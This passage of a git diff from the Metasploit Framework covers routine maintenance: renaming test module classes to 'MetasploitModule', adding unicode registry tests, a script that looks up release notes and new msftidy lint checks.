Bulletin MS15-093 - Critical", - "link": "https://technet.microsoft.com/en-us/library/security/ms15-093.aspx", - "displayLink": "technet.microsoft.com", - "snippet": "", - "htmlSnippet": "", - "cacheId": "2xDJB6zqL_sJ", - "formattedUrl": "https://technet.microsoft.com/en-us/library/security/ms15-093.aspx", - "htmlFormattedUrl": "https://technet.microsoft.com/en-us/library/security/ms15-093.aspx", - "pagemap": { - "metatags": [ - { - "search.mshkeyworda": "ms15-093", - "search.mshattr.assetid": "ms15-093", - "search.mshattr.docset": "bulletin", - "search.mshattr.sarticletype": "bulletin", - "search.mshattr.sarticleid": "MS15-093", - "search.mshattr.sarticletitle": "Security Update for Internet Explorer", - "search.mshattr.sarticledate": "2015-08-20", - "search.mshattr.sarticleseverity": "Critical", - "search.mshattr.sarticleversion": "1.1", - "search.mshattr.sarticlerevisionnote": "", - "search.mshattr.sarticleseosummary": "", - "search.mshattr.skbnumber": "3088903", - "search.mshattr.prefix": "MSRC", - "search.mshattr.topictype": "kbOrient", - "search.mshattr.preferredlib": "/library/security", - "search.mshattr.preferredsitename": "TechNet", - "search.mshattr.docsettitle": "MSRC Document", - "search.mshattr.docsetroot": "Mt404691", - "search.save": "history", - "search.microsoft.help.id": "ms15-093", - "search.description": "", - "search.mscategory": "dn567670", - "search.mscategoryv": "dn567670Security10", - "search.tocnodeid": "mt404691", - "mshkeyworda": "ms15-093", - "mshattr": "AssetID:ms15-093", - "save": "history", - "microsoft.help.id": "ms15-093" - } - ] - } - } - ] -} - | - end - - before(:example) do - allow_any_instance_of(MicrosoftPatchFinder::GoogleMsbSearch).to receive(:print_debug) - allow_any_instance_of(MicrosoftPatchFinder::GoogleMsbSearch).to receive(:send_http_request) { |info_obj, info_opts, opts| - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(json_data) - res - } - end - - let(:expected_msb) do - 'ms15-093' - end - - describe '#find_msb_numbers' do - it 'returns an array of msb numbers' do - results = google_msb_search.find_msb_numbers(expected_msb) - expect(results).to be_kind_of(Array) - expect(results).to eq([expected_msb]) - end - end - - describe '#search' do - it 'returns a hash (json data)' do - results = google_msb_search.search(starting_index: 1) - expect(results).to be_kind_of(Hash) - end - end - - describe '#parse_results' do - it 'returns a hash (json data)' do - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(json_data) - - results = google_msb_search.parse_results(res) - expect(results).to be_kind_of(Hash) - end - end - - describe '#get_total_results' do - it 'returns a fixnum' do - total = google_msb_search.get_total_results(JSON.parse(json_data)) - expect(total).to be_kind_of(Fixnum) - end - end - - describe '#get_next_index' do - it 'returns a fixnum' do - i = google_msb_search.get_next_index(JSON.parse(json_data)) - expect(i).to be_kind_of(Fixnum) - end - end - - end - - describe MicrosoftPatchFinder::Driver do - - let(:msb) do - 'ms15-100' - end - - let(:expected_link) do - 'http://download.microsoft.com/download/9/0/6/906BC7A4-7DF7-4C24-9F9D-3E801AA36ED3/Windows6.0-KB3087918-x86.msu' - end - - before(:example) do - opts = { keyword: msb } - allow(MicrosoftPatchFinder::OptsConsole).to receive(:get_parsed_options).and_return(opts) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:download_advisory).and_return(Rex::Proto::Http::Response.new) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:get_details_aspx).and_return([expected_link]) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:get_download_page).and_return(Rex::Proto::Http::Response.new) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:get_download_links).and_return([expected_link]) - allow_any_instance_of(MicrosoftPatchFinder::Driver).to receive(:print_debug) - allow_any_instance_of(MicrosoftPatchFinder::Driver).to receive(:print_error) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:print_debug) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:print_error) - end - - subject(:driver) do - MicrosoftPatchFinder::Driver.new - end - - describe '#get_download_links' do - it 'returns an array of links' do - results = driver.get_download_links(msb) - expect(results).to be_kind_of(Array) - expect(results.first).to eq(expected_link) - end - end - - describe '#google_search' do - it 'returns search results' do - skip('See rspec for MicrosoftPatchFinder::GoogleMsbSearch#find_msb_numbers') - end - end - - describe '#technet_search' do - it 'returns search results' do - skip('See rspec for MicrosoftPatchFinder::TechnetMsbSearch#find_msb_numbers') - end - end - - end - -end diff --git a/spec/tools/virustotal_spec.rb b/spec/tools/virustotal_spec.rb index ce9d04f023..09803e5406 100644 --- a/spec/tools/virustotal_spec.rb +++ b/spec/tools/virustotal_spec.rb @@ -172,19 +172,6 @@ RSpec.describe VirusTotalUtility do describe VirusTotalUtility::Driver do - # Get stdout: - # http://stackoverflow.com/questions/11349270/test-output-to-command-line-with-rspec - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - before do $stdin = StringIO.new("Y\n") end diff --git a/test/modules/auxiliary/test/capture.rb b/test/modules/auxiliary/test/capture.rb index 4e05e343fc..7635dd4e0c 100644 --- a/test/modules/auxiliary/test/capture.rb +++ b/test/modules/auxiliary/test/capture.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/test/modules/auxiliary/test/check.rb b/test/modules/auxiliary/test/check.rb index dbcb353284..09138e7dcb 100644 --- a/test/modules/auxiliary/test/check.rb +++ b/test/modules/auxiliary/test/check.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/test/modules/auxiliary/test/eth_spoof.rb b/test/modules/auxiliary/test/eth_spoof.rb index 087adf1282..c20f1d5ffe 100644 --- a/test/modules/auxiliary/test/eth_spoof.rb +++ b/test/modules/auxiliary/test/eth_spoof.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/test/modules/auxiliary/test/ftp_data.rb b/test/modules/auxiliary/test/ftp_data.rb index 8f22c67c49..d0b28c0421 100644 --- a/test/modules/auxiliary/test/ftp_data.rb +++ b/test/modules/auxiliary/test/ftp_data.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp diff --git a/test/modules/auxiliary/test/heaplib2.rb b/test/modules/auxiliary/test/heaplib2.rb index d50c432964..c1e9a0cbae 100644 --- a/test/modules/auxiliary/test/heaplib2.rb +++ b/test/modules/auxiliary/test/heaplib2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/test/modules/auxiliary/test/httpserver.rb b/test/modules/auxiliary/test/httpserver.rb index 8fc667d5c4..2da0069f68 100644 --- a/test/modules/auxiliary/test/httpserver.rb +++ b/test/modules/auxiliary/test/httpserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer diff --git a/test/modules/auxiliary/test/ip_spoof.rb b/test/modules/auxiliary/test/ip_spoof.rb index 50dc2f8ef4..dcb670d582 100644 --- a/test/modules/auxiliary/test/ip_spoof.rb +++ b/test/modules/auxiliary/test/ip_spoof.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/test/modules/auxiliary/test/recon_passive.rb b/test/modules/auxiliary/test/recon_passive.rb index dfd7a23b8e..11ec7c313b 100644 --- a/test/modules/auxiliary/test/recon_passive.rb +++ b/test/modules/auxiliary/test/recon_passive.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp diff --git a/test/modules/auxiliary/test/report_auth_info.rb b/test/modules/auxiliary/test/report_auth_info.rb index 256f549059..f93e01cc95 100644 --- a/test/modules/auxiliary/test/report_auth_info.rb +++ b/test/modules/auxiliary/test/report_auth_info.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary FAKE_IP = '192.168.12.123' FAKE_PORT = 80 diff --git a/test/modules/auxiliary/test/scanner_batch.rb b/test/modules/auxiliary/test/scanner_batch.rb index d9e8a346d7..120b02783b 100644 --- a/test/modules/auxiliary/test/scanner_batch.rb +++ b/test/modules/auxiliary/test/scanner_batch.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner diff --git a/test/modules/auxiliary/test/scanner_host.rb b/test/modules/auxiliary/test/scanner_host.rb index 2f9ff8475e..4ff7dd85b2 100644 --- a/test/modules/auxiliary/test/scanner_host.rb +++ b/test/modules/auxiliary/test/scanner_host.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner diff --git a/test/modules/auxiliary/test/scanner_range.rb b/test/modules/auxiliary/test/scanner_range.rb index 76210a771d..9c3f192320 100644 --- a/test/modules/auxiliary/test/scanner_range.rb +++ b/test/modules/auxiliary/test/scanner_range.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner diff --git a/test/modules/auxiliary/test/space-check.rb b/test/modules/auxiliary/test/space-check.rb index fea0b6870b..aaa7ae5f5a 100644 --- a/test/modules/auxiliary/test/space-check.rb +++ b/test/modules/auxiliary/test/space-check.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/test/modules/exploits/test/aggressive.rb b/test/modules/exploits/test/aggressive.rb index 293301faa3..f989bac288 100644 --- a/test/modules/exploits/test/aggressive.rb +++ b/test/modules/exploits/test/aggressive.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/test/modules/exploits/test/browserexploitserver.rb b/test/modules/exploits/test/browserexploitserver.rb index dc38645d7a..1ccd6ffadf 100644 --- a/test/modules/exploits/test/browserexploitserver.rb +++ b/test/modules/exploits/test/browserexploitserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/test/modules/exploits/test/check.rb b/test/modules/exploits/test/check.rb index 2b2aaf2ab5..5520014680 100644 --- a/test/modules/exploits/test/check.rb +++ b/test/modules/exploits/test/check.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit +class MetasploitModule < Msf::Exploit def initialize(info = {}) super(update_info(info, diff --git a/test/modules/exploits/test/cmdweb.rb b/test/modules/exploits/test/cmdweb.rb index ecf80239cb..22cd334e90 100644 --- a/test/modules/exploits/test/cmdweb.rb +++ b/test/modules/exploits/test/cmdweb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # =( need more targets and perhaps more OS specific return values OS specific would be preferred diff --git a/test/modules/exploits/test/dialup.rb b/test/modules/exploits/test/dialup.rb index c5a662edd2..edd7a228ee 100644 --- a/test/modules/exploits/test/dialup.rb +++ b/test/modules/exploits/test/dialup.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Dialup diff --git a/test/modules/exploits/test/egghunter.rb b/test/modules/exploits/test/egghunter.rb index 7c4ca444c6..6da35c4bcf 100644 --- a/test/modules/exploits/test/egghunter.rb +++ b/test/modules/exploits/test/egghunter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb b/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb index dd92b9309c..8505eaa529 100644 --- a/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb +++ b/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/test/modules/exploits/test/explib2_ie11_exec_test_case.rb b/test/modules/exploits/test/explib2_ie11_exec_test_case.rb index 9ac473a9c4..2715bd6a15 100644 --- a/test/modules/exploits/test/explib2_ie11_exec_test_case.rb +++ b/test/modules/exploits/test/explib2_ie11_exec_test_case.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/test/modules/exploits/test/exploitme.rb b/test/modules/exploits/test/exploitme.rb index 7a728b1a1b..f07278feeb 100644 --- a/test/modules/exploits/test/exploitme.rb +++ b/test/modules/exploits/test/exploitme.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/test/modules/exploits/test/java_tester.rb b/test/modules/exploits/test/java_tester.rb index 654901ffc2..ae1602c66f 100644 --- a/test/modules/exploits/test/java_tester.rb +++ b/test/modules/exploits/test/java_tester.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking def initialize( info = {} ) diff --git a/test/modules/exploits/test/js_tester.rb b/test/modules/exploits/test/js_tester.rb index 3483c27d10..e264e61b45 100644 --- a/test/modules/exploits/test/js_tester.rb +++ b/test/modules/exploits/test/js_tester.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/test/modules/exploits/test/kernel.rb b/test/modules/exploits/test/kernel.rb index 5ca63ed3a4..1848e44631 100644 --- a/test/modules/exploits/test/kernel.rb +++ b/test/modules/exploits/test/kernel.rb @@ -8,7 +8,7 @@ require 'msf/core' # # This is a test exploit for testing kernel-mode payloads. # -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Udp diff --git a/test/modules/exploits/test/shell.rb b/test/modules/exploits/test/shell.rb index a961d3cbf8..237a48b484 100644 --- a/test/modules/exploits/test/shell.rb +++ b/test/modules/exploits/test/shell.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/test/modules/post/test/extapi.rb b/test/modules/post/test/extapi.rb index 3323bc8ad6..0b25fb123d 100644 --- a/test/modules/post/test/extapi.rb +++ b/test/modules/post/test/extapi.rb @@ -6,7 +6,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest diff --git a/test/modules/post/test/file.rb b/test/modules/post/test/file.rb index 798b183b99..e38a99d1ac 100644 --- a/test/modules/post/test/file.rb +++ b/test/modules/post/test/file.rb @@ -8,7 +8,7 @@ require 'module_test' #load 'lib/rex/text.rb' #load 'lib/msf/core/post/file.rb' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Common diff --git a/test/modules/post/test/get_env.rb b/test/modules/post/test/get_env.rb index 32dcb9376f..c70d61de96 100644 --- a/test/modules/post/test/get_env.rb +++ b/test/modules/post/test/get_env.rb @@ -7,7 +7,7 @@ require 'module_test' #load 'lib/rex/text.rb' #load 'lib/msf/core/post/common.rb' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Common diff --git a/test/modules/post/test/meterpreter.rb b/test/modules/post/test/meterpreter.rb index 005725c3cc..a4a8d5c95e 100644 --- a/test/modules/post/test/meterpreter.rb +++ b/test/modules/post/test/meterpreter.rb @@ -6,7 +6,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest diff --git a/test/modules/post/test/railgun_reverse_lookups.rb b/test/modules/post/test/railgun_reverse_lookups.rb index 7b2c1f6daa..be93bd2809 100644 --- a/test/modules/post/test/railgun_reverse_lookups.rb +++ b/test/modules/post/test/railgun_reverse_lookups.rb @@ -12,7 +12,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Windows::Railgun diff --git a/test/modules/post/test/registry.rb b/test/modules/post/test/registry.rb index 89bf6415e6..cd1e9c4fce 100644 --- a/test/modules/post/test/registry.rb +++ b/test/modules/post/test/registry.rb @@ -12,7 +12,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Windows::Registry @@ -126,7 +126,6 @@ class Metasploit3 < Msf::Post ret end - it "should write REG_DWORD values" do ret = true registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD") @@ -154,6 +153,41 @@ class Metasploit3 < Msf::Post ret end + it "should create unicode keys" do + ret = registry_createkey(%q#HKCU\σονσλυσιονεμκυε#) + end + + it "should write REG_SZ unicode values" do + ret = true + registry_setvaldata(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str", "дэлььякатезшимя", "REG_SZ") + registry_setvaldata(%q#HKCU\σονσλυσιονεμκυε#, "test_val_dword", 1234, "REG_DWORD") + valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str") + if (valinfo.nil?) + ret = false + else + # type == REG_SZ means string + ret &&= !!(valinfo["Type"] == 1) + ret &&= !!(valinfo["Data"].kind_of? String) + ret &&= !!(valinfo["Data"] == "дэлььякатезшимя") + end + + ret + end + + + it "should delete unicode keys" do + ret = registry_deleteval(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str") + valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str") + # getvalinfo should return nil for a non-existent key + ret &&= (valinfo.nil?) + ret &&= registry_deletekey(%q#HKCU\σονσλυσιονεμκυε#) + # Deleting the key should delete all its values + valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_dword") + ret &&= (valinfo.nil?) + + ret + end + end end diff --git a/test/modules/post/test/services.rb b/test/modules/post/test/services.rb index d5c9c9dff5..0a4531f076 100644 --- a/test/modules/post/test/services.rb +++ b/test/modules/post/test/services.rb @@ -10,7 +10,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Services include Msf::ModuleTest::PostTest diff --git a/test/modules/post/test/unix.rb b/test/modules/post/test/unix.rb index e862a388d8..95560225c1 100644 --- a/test/modules/post/test/unix.rb +++ b/test/modules/post/test/unix.rb @@ -9,7 +9,7 @@ require 'module_test' #load 'lib/msf/core/post/linux/system.rb' #load 'lib/msf/core/post/unix/enum_user_dirs.rb' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Linux::System diff --git a/tools/dev/find_release_notes.rb b/tools/dev/find_release_notes.rb new file mode 100644 index 0000000000..fbd073a5ae --- /dev/null +++ b/tools/dev/find_release_notes.rb @@ -0,0 +1,159 @@ +#!/usr/bin/env ruby + +require 'net/http' +require 'nokogiri' +require 'thread' + +module ReleaseNotesFinder + # This finds the release notes information based on either: + # 1. A PR number. In release notes, PR numbers are for bug fixes and notable changes. + # 2. A module short name. For example: ms08_067_netapi + class Client + attr_accessor :release_notes + + RELEASE_NOTES_PAGE = 'https://community.rapid7.com/docs/DOC-2918'.freeze + + def initialize + init_release_notes + @mutex = Mutex.new + end + + def add_release_notes_entry(row) + td = row.search('td') + release_notes_link = td[0] && td[0].at('a') ? td[0].at('a').attributes['href'].value : '' + release_notes_num = td[0] && td[0].at('a') ? td[0].at('a').text.scan(/\d{10}/).flatten.first || '' : '' + highlights = td[1] ? (td[1].search('span') || []).map { |e| e.text } * " " : '' + update_link = td[2] && td[2].at('a') ? td[2].at('a').attributes['href'].value : '' + + @release_notes << { + release_notes_link: release_notes_link, + release_notes_num: release_notes_num, + highlights: highlights, + update_link: update_link, + pull_requests: [], + new_modules: [] + } + end + + def init_release_notes + self.release_notes = [] + + html = send_http_request(RELEASE_NOTES_PAGE) + table_rows_pattern = 'div[@id="jive-body-main"]//div//section//div//div[@class="j-rte-table"]//table//tbody//tr' + rows = html.search(table_rows_pattern) + rows.each do |row| + add_release_notes_entry(row) + end + end + + def update_pr_list(n, text) + pr_num, desc = text.scan(/#(\d+).\x20*(.+)/).flatten + return unless pr_num + n[:pull_requests] << { id: pr_num, description: desc } + end + + def update_module_list(n, li) + li.search('a').each do |a| + next if a.attributes['href'].nil? + n[:new_modules] << { link: a.attributes['href'].value } + end + end + + def update_release_notes_entry(n) + html = send_http_request(n[:release_notes_link]) + pattern = '//div[@class="jive-rendered-content"]//ul//li' + html.search(pattern).each do |li| + @mutex.synchronize do + update_pr_list(n, li.text) + update_module_list(n, li) + end + end + end + + def get_release_notes(input) + release_notes.each do |n| + if n[:pull_requests].empty? + update_release_notes_entry(n) + end + + input_type = guess_input_type(input) + + case input_type + when :pr + m = get_release_notes_from_pr(n, input) + when :module_name + m = get_release_notes_from_module_name(n, input) + end + + return m if m + end + + nil + end + + def guess_input_type(input) + input =~ /^\d+/ ? :pr : :module_name + end + + def get_release_notes_from_module_name(n, input) + n[:new_modules].each do |m| + return n if m[:link] && m[:link].include?(input) + end + + nil + end + + def get_release_notes_from_pr(n, pr) + n[:pull_requests].each do |p| + return n if p[:id] && pr == p[:id] + end + + nil + end + + def send_http_request(uri) + url = URI.parse(uri) + cli = Net::HTTP.new(url.host, url.port) + cli.use_ssl = true + req = Net::HTTP::Get.new(url.request_uri) + res = cli.request(req) + Nokogiri::HTML(res.body) + end + end +end + +def main + inputs = [] + + ARGV.length.times { inputs << ARGV.shift } + puts "[*] Enumerating release notes..." + cli = ReleaseNotesFinder::Client.new + puts "[*] Finding release notes for items: #{inputs * ', '}" + threads = [] + begin + inputs.each do |input| + t = Thread.new do + n = cli.get_release_notes(input) + puts "\n" + + if n + puts "[*] Found release notes for: #{input}" + puts "Release Notes Number: #{n[:release_notes_num]}" + puts "Release Notes Link: #{n[:release_notes_link] || 'N/A'}" + puts "Update Link: #{n[:update_link] || 'N/A'}" + puts "Highlights:\n#{n[:highlights]}" + else + puts "[*] Unable to find release notes for: #{input}" + end + end + threads << t + end + threads.each { |t| t.join } + ensure + threads.each { |t| t.kill } + end +end + +if __FILE__ == $PROGRAM_NAME + main +end diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index 1f17891ccd..eb294cd2f0 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -65,6 +65,7 @@ class Msftidy def initialize(source_file) @full_filepath = source_file + @module_type = File.dirname(File.expand_path(@full_filepath))[/\/modules\/([^\/]+)/, 1] @source = load_file(source_file) @lines = @source.lines # returns an enumerator @status = OK @@ -464,13 +465,40 @@ class Msftidy def check_bad_terms # "Stack overflow" vs "Stack buffer overflow" - See explanation: # http://blogs.technet.com/b/srd/archive/2009/01/28/stack-overflow-stack-exhaustion-not-the-same-as-stack-buffer-overflow.aspx - if @source =~ /class Metasploit\d < Msf::Exploit::Remote/ and @source.gsub("\n", "") =~ /stack[[:space:]]+overflow/i + if @module_type == 'exploit' && @source.gsub("\n", "") =~ /stack[[:space:]]+overflow/i warn('Contains "stack overflow" You mean "stack buffer overflow"?') - elsif @source =~ /class Metasploit\d < Msf::Auxiliary/ and @source.gsub("\n", "") =~ /stack[[:space:]]+overflow/i + elsif @module_type == 'auxiliary' && @source.gsub("\n", "") =~ /stack[[:space:]]+overflow/i warn('Contains "stack overflow" You mean "stack exhaustion"?') end end + def check_bad_super_class + # skip payloads, as they don't have a super class + return if @module_type == 'payloads' + + # get the super class in an ugly way + unless (super_class = @source.scan(/class Metasploit(?:\d|Module)\s+<\s+(\S+)/).flatten.first) + error('Unable to determine super class') + return + end + + prefix_super_map = { + 'auxiliary' => /^Msf::Auxiliary$/, + 'exploits' => /^Msf::Exploit(?:::Local|::Remote)?$/, + 'encoders' => /^(?:Msf|Rex)::Encoder/, + 'nops' => /^Msf::Nop$/, + 'post' => /^Msf::Post$/ + } + + if prefix_super_map.key?(@module_type) + unless super_class =~ prefix_super_map[@module_type] + error("Invalid super class for #{@module_type} module (found '#{super_class}', expected something like #{prefix_super_map[@module_type]}") + end + else + warn("Unexpected and potentially incorrect super class found ('#{super_class}')") + end + end + def check_function_basics functions = @source.scan(/def (\w+)\(*(.+)\)*/) @@ -481,6 +509,12 @@ class Msftidy end end + def check_bad_class_name + if @source =~ /^\s*class (Metasploit\d+)\s*</ + warn("Please use 'MetasploitModule' as the class name (you used #{Regexp.last_match(1)})") + end + end + def check_lines url_ok = true no_stdio = true @@ -557,7 +591,7 @@ class Msftidy end # Auxiliary modules do not have a rank attribute - if ln =~ /^\s*Rank\s*=\s*/ and @source =~ /<\sMsf::Auxiliary/ + if ln =~ /^\s*Rank\s*=\s*/ && @module_type == 'auxiliary' warn("Auxiliary modules have no 'Rank': #{ln}", idx) end @@ -652,6 +686,41 @@ class Msftidy end end + # + # Run all the msftidy checks. + # + def run_checks + check_mode + check_shebang + check_nokogiri + check_rubygems + check_ref_identifiers + check_old_keywords + check_verbose_option + check_badchars + check_extname + check_old_rubies + check_ranking + check_disclosure_date + check_title_casing + check_bad_terms + check_bad_super_class + check_bad_class_name + check_function_basics + check_lines + check_snake_case_filename + check_comment_splat + check_vuln_codes + check_vars_get + check_newline_eof + check_sock_get + check_udp_sock_get + check_invalid_url_scheme + check_print_debug + check_register_datastore_debug + check_use_datastore_debug + end + private def load_file(file) @@ -670,71 +739,37 @@ class Msftidy end end -# -# Run all the msftidy checks. -# -# @param full_filepath [String] The full file path to check -# @return status [Integer] A status code suitable for use as an exit status -def run_checks(full_filepath) - tidy = Msftidy.new(full_filepath) - tidy.check_mode - tidy.check_shebang - tidy.check_nokogiri - tidy.check_rubygems - tidy.check_ref_identifiers - tidy.check_old_keywords - tidy.check_verbose_option - tidy.check_badchars - tidy.check_extname - tidy.check_old_rubies - tidy.check_ranking - tidy.check_disclosure_date - tidy.check_title_casing - tidy.check_bad_terms - tidy.check_function_basics - tidy.check_lines - tidy.check_snake_case_filename - tidy.check_comment_splat - tidy.check_vuln_codes - tidy.check_vars_get - tidy.check_newline_eof - tidy.check_sock_get - tidy.check_udp_sock_get - tidy.check_invalid_url_scheme - tidy.check_print_debug - tidy.check_register_datastore_debug - tidy.check_use_datastore_debug - return tidy -end - ## # # Main program # ## -dirs = ARGV +if __FILE__ == $PROGRAM_NAME + dirs = ARGV -@exit_status = 0 + @exit_status = 0 -if dirs.length < 1 - $stderr.puts "Usage: #{File.basename(__FILE__)} <directory or file>" - @exit_status = 1 - exit(@exit_status) -end - -dirs.each do |dir| - begin - Find.find(dir) do |full_filepath| - next if full_filepath =~ /\.git[\x5c\x2f]/ - next unless File.file? full_filepath - next unless full_filepath =~ /\.rb$/ - msftidy = run_checks(full_filepath) - @exit_status = msftidy.status if (msftidy.status > @exit_status.to_i) - end - rescue Errno::ENOENT - $stderr.puts "#{File.basename(__FILE__)}: #{dir}: No such file or directory" + if dirs.length < 1 + $stderr.puts "Usage: #{File.basename(__FILE__)} <directory or file>" + @exit_status = 1 + exit(@exit_status) end -end -exit(@exit_status.to_i) + dirs.each do |dir| + begin + Find.find(dir) do |full_filepath| + next if full_filepath =~ /\.git[\x5c\x2f]/ + next unless File.file? full_filepath + next unless full_filepath =~ /\.rb$/ + msftidy = Msftidy.new(full_filepath) + msftidy.run_checks + @exit_status = msftidy.status if (msftidy.status > @exit_status.to_i) + end + rescue Errno::ENOENT + $stderr.puts "#{File.basename(__FILE__)}: #{dir}: No such file or directory" + end + end + + exit(@exit_status.to_i) +end diff --git a/tools/exploit/jsobfu.rb 